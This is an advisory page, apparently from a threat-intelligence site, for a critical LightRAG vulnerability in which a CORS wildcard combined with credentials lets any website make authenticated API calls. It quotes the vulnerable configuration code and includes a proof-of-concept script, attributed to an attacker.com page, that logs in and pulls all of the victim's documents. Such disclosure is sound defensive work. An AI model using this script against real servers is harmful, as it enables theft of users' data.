criticalCVSS 9.3Vulnerability

CVE-2026-61736

### Summary The server defaults to CORS_ORIGINS=* combined with allow_credentials=True. Starlette's CORSMiddleware echoes the requesting origin in preflight responses when credentials are enabled, meaning every origin is effectively whitelisted for credentialed cross-origin requests. Any malicious website can perform authenticated API calls on behalf of a logged-in user. ### Details ```python # lightrag/api/config.py:639 args.cors_origins = get_env_value("CORS_ORIGINS", "*") # default wildcard # lightrag/api/lightrag_server.py:1379 app.add_middleware( CORSMiddleware, allow_origins=["*"], # any origin allow_credentials=True, # credentials — PROBLEM with wildcard allow_methods=["*"], allow_headers=["*"], ) # Starlette CORSMiddleware (confirmed in source): # preflight_explicit_allow_origin = not allow_all_origins or allow_credentials # = not True or True = True → echoes the requesting origin back, not "*" # Result: every origin receives Access-Control-Allow-Credentials: true ``` ### PoC Host on any origin. Open in browser where user is logged in to LightRAG: ```html <!-- attacker.com/steal.html --> <script> const TARGET = "http://lightrag-server:9621"; (async () => { // Get victim token (or re-use existing session) const r1 = await fetch(`${TARGET}/login`, { method: "POST", credentials: "include", headers: {"Content-Type": "application/x-www-form-urlencoded"}, body: "username=victim&password=known_pass" }); const { access_token } = await r1.json(); // Exfiltrate all documents const docs = await (await fetch(`${TARGET}/documents`, { credentials: "include", headers: { Authorization: `Bearer ${access_token}` } })).json(); console.log("STOLEN DOCS:", docs); })(); </script> ``` ### Impact Permissive cross-domain policy (CWE-942). Any website visited by an authenticated LightRAG user can silently make authenticated API requests, exfiltrating all documents and knowledge graph data or performing destruc

Properties

severity
critical
summary
LightRAG: CORS Wildcard + Credentials Enables Any-Origin Credentialed Requests
epss_score
0.00532
cvss_score
9.3
ghsa_published
2026-07-20T21:45:25Z
source_url
https://github.com/advisories/GHSA-6x6h-qqr7-855w
ghsa_updated
2026-07-20T21:45:27Z
ghsa_id
GHSA-6x6h-qqr7-855w
cve_id
CVE-2026-61736
cvss_vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
is_ghsa_only
false
epss_percentile
0.42923

Related Entities (5)

ENRICHED_BY (1)

[Source]FIRST EPSS

HAS_WEAKNESS (1)

[Weakness]Permissive Cross-domain Security Policy with Untrusted Domains

REPORTED_BY (1)

[Source]GitHub Advisory Database

VULNERABLE_TO (1)

[Software]pip/lightrag-hku

AFFECTS (1)

[Software]pip/lightrag-hku

Explore deeper with Ninja Signal's threat intelligence graph

CVE-2026-61736 (CVSS 9.3) — Ninja Signal Threat Intelligence | Ninja Signal